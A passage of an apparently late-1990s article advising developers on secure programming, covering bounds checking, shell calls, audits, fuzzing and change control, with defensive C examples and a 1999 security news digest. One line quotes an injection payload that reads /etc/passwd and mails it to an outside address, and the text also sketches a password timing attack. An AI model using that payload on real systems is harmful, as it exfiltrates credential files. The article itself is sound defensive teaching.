It is very common for input statements to assume a fixed maximum input
length but not enforce it. For example, we might read input into an
array of 128 characters. If we get longer inputs and find errors, we
might debug the program by making the array longer. But this doesn't
really solve the problem. The real problem is that we are using a fixed
array but not dealing with the error condition associated with
over-sized inputs. The more secure solution is to make certain that we
have proper error handling on inputs that are too big to fit in the
array. We can still change the size of the array if we need to, but no
matter what the size, we still need to check input lengths and properly
handle errors - even if they are 'theoretically' impossible. The reason
we need to handle these cases is that we often depend on other parts of
the system for the conditions that make excessive inputs impossible, but
those conditions may change, and we don't want the program to fail
unpredictably just because somebody else changed an array size or
constant. Here's a rather obvious real-world example:
#define SIZE 1024
char x[SIZE];
read(0, x, 1023);
If somebody comes along and makes SIZE smaller in the next program
revision, there could be an input overflow.
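The safer pattern can be sketched in C. Here `read_line` is a hypothetical helper (the name and the reuse of SIZE are ours): every length is derived from the one constant, and over-long input is treated as an error to handle, not an impossibility.

```c
#include <stdio.h>
#include <string.h>

#define SIZE 1024  /* single source of truth for the buffer size */

/* Read one line into buf (capacity SIZE); return 0 on success,
   -1 on EOF/error or if the input was too long to fit.  Oversized
   input is an error we handle, not one we hope never happens. */
int read_line(char *buf, FILE *in)
{
    if (fgets(buf, SIZE, in) == NULL)
        return -1;                      /* EOF or read error */
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';            /* complete line: strip newline */
        return 0;
    }
    /* No newline: the line was longer than SIZE-1 bytes.  Drain the
       rest so the next read starts on a fresh line, then report it. */
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;
    return -1;
}
```

Because the read length comes from SIZE rather than a separate literal, shrinking SIZE in a later revision cannot reintroduce the overflow.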
2 - Use of external programs via command interpreters
A lot of the time, we find it easier to run an external program than to
build the same functionality into our own program. This has lots of
problems related to the other program
changing 'underneath' us, and this condition should be considered as
well, but in addition to that, one of the most common security problems
comes from the way the other program is called. Rather than use an
'exec' system call or some other such thing, we are often lazy and
choose to use the command interpreter. Being lazy is sometimes good
from a standpoint of the efficiency of your time, but it is often bad
from a security standpoint. Here's an example of a perl script fragment
that has a rather obvious flaw of this sort:
system("glimpse -H /database -y -i $Close $WordPart $d '$string;$string2;$string3' | nor $dir");
If any of these variables contain user input, they might include
something like this:
`cat /etc/passwd | /bin/mail email@example.com`
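A safer calling pattern, sketched as a POSIX C fragment (`run_argv` is a hypothetical helper, not a library function): each argument is passed as a separate argv element, so no shell ever parses the user's string.

```c
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run a program directly with fork/execvp.  Each argument is passed
   as-is in argv: no shell parses the string, so backquotes, ';' and
   '|' in user input are just ordinary characters. */
int run_argv(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);                 /* exec failed in the child */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

For the glimpse example, the caller would build `char *argv[] = { "glimpse", "-H", "/database", "-y", "-i", user_string, NULL };` and call `run_argv(argv)`; the user's string reaches glimpse as one literal argument, never as shell text.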
3 - Unnecessary functionality - like access to Vbasic for running programs
In a recent radio show, I heard a caller liken having visual basic
functions for file deletion in Word to having an 'empty the oil' button
on the dashboard of every car. This is indeed one of the reasons we
have had some 20,000 new Word viruses in the last 6 months. If you
don't need to provide unlimited function to the user - don't. At a
minimum, disable the dangerous functions or make them hard to access by
checking inputs before interpretation.
4 - Including executable content without a good reason
I have a pet peeve. It's the use of Java and ActiveX and similar general
purpose capabilities to do simple things that don't require them. When
I hit a Web page that waits for my mouse to move over the logo before
giving me the menu, I feel offended. This type of thing is mostly a way
to show that you know how to use a language feature - it is not a benefit
to the user - or even particularly clever. When in doubt - cut it out.
5 - Train your people in information protection
It doesn't take all that much effort to learn about common security
flaws in software. Here's another one... Two programs open the same
file without proper file locking. The result is a race condition which
can leave the file in an inconsistent state. If the file is later used
for something like an access control decision - you may lose. Here's
another one... When checking a password, a program checks the first
character first, and returns a failure if it's wrong - otherwise, it
looks at the next character, and so on. The flaw is that the program's
decision time can be used to quickly figure out the password - it's
slower if the first character is right than if it's wrong. I can try
all possibilities in a few seconds. There are lots of these sorts of
things, and I don't have room in this article to list very many of them.
So take the time to study the subject and train your people on it, and
they will make fewer of the mistakes that others have made before them.
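The password timing flaw above can be closed by comparing in constant time. A minimal C sketch (the function name is ours): instead of returning at the first mismatch, accumulate the XOR of every byte, so the time taken does not depend on where (or whether) the inputs differ.

```c
#include <stddef.h>

/* Compare two same-length buffers in time that does not depend on
   where (or whether) they differ: accumulate the XOR of every byte
   instead of returning at the first mismatch. */
int equal_consttime(const unsigned char *a, const unsigned char *b, size_t n)
{
    unsigned char diff = 0;
    for (size_t i = 0; i < n; i++)
        diff |= a[i] ^ b[i];
    return diff == 0;
}
```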
6 - Use skilled, experienced artisans
People ask me how I came to know of so many ways that systems can go
wrong. My answer is simple - I have been watching them go wrong for a
very long time. The longer you write programs, the more things you know
of that can go wrong with them, and the better you tend to do in
avoiding these kinds of mistakes. Ignorance is not bliss - it's full of
security holes.
Part 2 - Provide for rapid response:
OK - so everybody makes mistakes. But just because you make them,
doesn't mean you have to let them remain mistakes. By responding
quickly and openly, you can (1) fix the problem before it causes much
harm, (2) make your customers believe you care about them, and (3)
get widespread open praise from the security community.
7 - Internet-based software updates - encrypted and authenticated
The fastest low-cost way to update faulty software is to make updates
available via the Internet. But please - don't just let the poor user
download any piece of software and shove it into your program. It will
ruin your reputation and make your customers unhappy. Provide for
strong encryption to keep your trade secrets more secure - and strong
authentication to keep your customers from getting false updates and
installing them. It's inexpensive, easy to use, faster, and more
reliable than the alternatives.
8 - Find and fix them before they affect the customer
What customers really like to see is faults that are fixed before they
cause harm. Just because you released the product doesn't mean you
can't still improve it. Make it part of the support contract and spend
some of your time finding and fixing the faults you missed in the last
distribution. Not only will your product be better, your customers will
be happier, and the bug you fix today won't come back to bite you later.
9 - Easy reporting of flaws and rapid response to them
When the customer calls, I answer. If they call about a flaw, I try
hard to fix it fast and get the word of the fix out as soon as possible.
If it's a security flaw, I try to get the fix out within a matter of
hours - and the faster the better. I want my customers to report faults
and I want to fix them between the time of the first call and the time
the next bad result happens. So should you.
Part 3 - Use reasonable and prudent measures:
Nobody is or can be perfect today when it comes to commercial software.
We don't really even know what perfect means. But just because you
can't have the perfect body, that doesn't mean you should weigh a ton,
smoke like a chimney, and eat cheeseburgers for all three meals every
day. Perfection isn't the goal, but reasonable and prudent is. So what
is reasonable and prudent? It depends on the consequences of a mistake.
Here are things that any quality software developer should include in
their process:
10 - Do an independent protection audit before release
If you have a security feature in your product, don't risk embarrassment
in front of the whole world and scores of script kiddies breaking into
your systems from all over the world. Have somebody who knows what they
are doing take a look at it first. Have them ask questions and try
things out. The developers of the e-commerce package that was recently
released and left numerous client names, addresses, and credit card
numbers available via a simple hotbot search on the Web did not do
themselves a favor by skimping on a security audit. Adding a single
command to an installation script could have saved them a lot of
embarrassment and their customers' customers a lot of time, money, and
grief.
11 - Use good change control in your software update process
The US telephone systems have crashed on a national scale several times
because the people who maintained the software didn't have a process in
place to compare the last version to the next version. They certainly
would have noticed the change in priority that brought down several
major cities for about a week if they had simply run a standard check.
Look for changes, make sure they make sense, and save yourself a lot of
embarrassment and ridicule.
12 - Provide a secure manufacturing and distribution mechanism
When the largest software developer in the world released a computer
virus on a major product's distribution disks, they were not the first,
nor were they the last to have their content corrupted between the test
phase and the manufacturing phase. At a minimum, take samples off the
production line before shipment, compare them to the original sources
used in the testing phase, and re-test them with your standard test
suite.
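A minimal C sketch of the sample check: compare a unit taken off the production line byte-for-byte against the master used in testing (`files_identical` is a hypothetical helper; in practice you would also compare cryptographic hashes).

```c
#include <stdio.h>

/* Return 1 if the two files are byte-for-byte identical, 0 if they
   differ, -1 if either cannot be opened.  Enough to catch content
   corrupted between the test phase and the production line. */
int files_identical(const char *path_a, const char *path_b)
{
    FILE *a = fopen(path_a, "rb");
    FILE *b = fopen(path_b, "rb");
    int result = -1;
    if (a && b) {
        int ca, cb;
        do {
            ca = fgetc(a);
            cb = fgetc(b);
        } while (ca == cb && ca != EOF);
        result = (ca == cb);    /* 1 only if both hit EOF together */
    }
    if (a) fclose(a);
    if (b) fclose(b);
    return result;
}
```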
13 - Track who does what and attribute faults to root causes
Everybody makes mistakes, but a surprisingly small number of people make
a surprisingly large portion of them, and the majority of the mistakes
are very similar to each other. When you track these things down and
find root causes, you can also find ways to eliminate them in the
future. That doesn't mean you will get to perfection, but it sure is
nice to be a little bit closer.
Part 4 - Provide a beta-testing process that helps to find the flaws:
Lots of people complain that the customers end up testing the products
these days, and I think it's largely true. The rush to market seems to
override all prudence in product quality for some companies. But I am a
firm believer in the alpha test and the beta test.
14 - Internal beta-testing should seek out flaws relentlessly
If you don't have an internal testing team that knows about security
testing, get one. The cost of fixing a security hole in the field is
several orders of magnitude more expensive than finding it before the
release.
15 - Get some monkeys on your keyboards
You would be amazed at how easily a 2-year old can crash your programs.
They don't know enough to do what you expect, and chances are you don't
know enough to anticipate what they will do. I find flaws by simply
shoving random inputs into programs and waiting for them to crash.
There is a good chance that the crash was the result of a flaw that
could be exploited for a security attack.
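That kind of monkey testing is easy to automate. Here is a self-contained C sketch: a toy parser plus a random-input harness (both hypothetical), where a fixed seed makes every run identical so any failure can be replayed.

```c
#include <stdlib.h>

/* Toy target: parse an unsigned decimal number, returning -1 on
   any malformed or overflowing input instead of trusting it. */
long parse_uint(const char *s, size_t n)
{
    if (n == 0)
        return -1;
    long v = 0;
    for (size_t i = 0; i < n; i++) {
        if (s[i] < '0' || s[i] > '9')
            return -1;
        if (v > (2147483647L - (s[i] - '0')) / 10)
            return -1;                          /* would overflow */
        v = v * 10 + (s[i] - '0');
    }
    return v;
}

/* Monkey test: hammer the parser with random byte strings and check
   its one invariant (result is -1 or a valid non-negative value).
   The fixed seed makes every run repeatable. */
int fuzz(unsigned seed, int iterations)
{
    srand(seed);
    for (int i = 0; i < iterations; i++) {
        char buf[32];
        size_t n = (size_t)(rand() % (int)sizeof buf);
        for (size_t j = 0; j < n; j++)
            buf[j] = (char)(rand() % 256);
        if (parse_uint(buf, n) < -1)
            return -1;                          /* invariant violated */
    }
    return 0;
}
```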
16 - Build a repeatable testing capability
You need to be able to try it again under identical conditions.
Otherwise, you will never be sure you fixed it when you think you fixed
it. Whatever the 'it' is in this case, repeatability and automation of
the testing process is a major key to success and efficiency. If you
can't buy it - build it.
17 - Get an outside community with an interest in finding and fixing holes
If you can't test it well enough yourself, figure out a way to get
outsiders interested enough to help you find the holes. They will not
be as efficient as a good internal effort, but it's better than nothing.
Part 5 - Just because you can't be perfect doesn't mean you shouldn't try:
18 - Don't throw up your hands - work the issues
I've seen lots of people who simply throw up their hands and think that
this problem is too difficult to solve. I think they are wrong. Even
if you can't do it perfectly, you can do it well enough to compete on
security.
19 - Use constant quality improvement to enhance your security
Don't do what a major computer manufacturer did. They fixed a bug in a
system library that allowed anyone on the Internet to gain unlimited
access to any of their systems, and in the next version, they undid the
fix. Strive to always get better and to propagate your fixes forward in
time. Version control includes propagation of fixes into new versions.
20 - People who complain about 'defensive programming' don't belong
I've heard it a hundred times. 'That's defensive programming' ...
'That can never happen' ... 'Nobody will ever figure that out' ...
They are all wrong and they don't belong in a professional programming
environment. Programs that depend on other programs and programmers
that depend on other programmers must understand that the other person's
mistake can turn into your security hole. You need to check your
assumptions - at design time - at compile time - at run time - at
testing time - all the time. The same programmers who give up tens of
thousands of CPU cycles to save some programming effort by calling an
external program, seem to think it is inefficient to do bounds checking
on input arrays. It's an example of a false efficiency.
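Checking assumptions costs almost nothing. A C sketch (MAXLEN and `copy_field` are hypothetical) that checks one design assumption at compile time and handles the 'can never happen' case at run time:

```c
#include <string.h>

#define MAXLEN 64

/* Copy an input field into a fixed buffer, checking the assumption
   "input fits" at run time instead of trusting the caller. */
int copy_field(char dst[MAXLEN], const char *src)
{
    /* compile-time check of a design assumption (C11): catches
       someone shrinking MAXLEN below what the protocol requires */
    _Static_assert(MAXLEN >= 16, "field buffer too small for protocol");

    size_t n = strlen(src);
    if (n >= MAXLEN)
        return -1;          /* 'can never happen' - handle it anyway */
    memcpy(dst, src, n + 1);
    return 0;
}
```

The length check is a handful of cycles, dwarfed by the thousands spent on any call to an external program; that is the false efficiency the complainers are defending.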
Bonus - Every problem is also an opportunity
These days, security is something you can take to the bank, and
insecurity is something that can send you to the poor-house. Think of
this article as your chance to make millions of dollars by doing a
better job than your competitors at something that top management is
starting to acknowledge is a higher priority than a paper-clip that beeps
on the screen and stops your work to tell you how to do something you
don't actually want to do. Take this opportunity to make a better
product with a lower life-cycle cost, higher return on investment, and
no embarrassing press.
Part 6 - This Week...
Finally, here is an extract of a week's worth of news items related to
software security faults that got out into the public. Try to avoid
making this list...
04 May 1999: Two More IE 5 Security Holes
One bug lets people who use your computer see where you've been online
and another allows users who share browsers to access password-protected
Web sites.
02 May 1999: New Code Breaking Device Proposed
An Israeli computer scientist, who is also the S in the widely used RSA
algorithm, presented a paper which describes a device he says will be
capable of cracking 512 bit keys.
29 April 1999: ColdFusion's Vulnerability the Target of Increased Hacking
A security hole which resulted from a sample application sent with
ColdFusion Application Server's documentation allows hackers access to
all data stored on the web server. Since a new posting about this
vulnerability last week, more than 100 sites using the software have
been attacked.
29 April 1999: Intel Chip's Serial Number Rears its Head Again
While Intel has distributed software which it says hides its chip's
embedded serial number, Zero-Knowledge Systems, a Canadian software
company, has placed a program on the web which makes it visible again.